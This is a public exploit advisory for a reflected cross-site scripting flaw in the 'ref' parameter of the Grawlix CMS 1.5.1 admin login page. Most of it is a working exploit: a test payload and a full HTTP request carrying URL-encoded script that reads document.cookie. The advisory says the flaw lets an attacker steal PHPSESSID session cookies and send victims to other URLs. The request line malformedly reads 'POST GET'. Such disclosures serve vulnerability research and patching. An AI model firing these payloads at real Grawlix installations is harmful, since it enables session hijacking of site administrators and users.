## Title: grawlix-1.5.1 XSS-Reflected ## Author: nu11secur1ty ## Date: 08/29/2023 ## Vendor: https://getgrawlix.com/ ## Software: ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submitted in the ref parameter. This input was echoed unmodified in the application's response. The attacker can steal PHPSESSID cookie and can trick the victim into visiting his or some other dangerous URL address. STATUS: HIGH-Vulnerability [+]Exploit: ```POST GET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=Login HTTP/1.1 Host: localhost sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2 Connection: close ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html) ## Time spend: 00:27:00
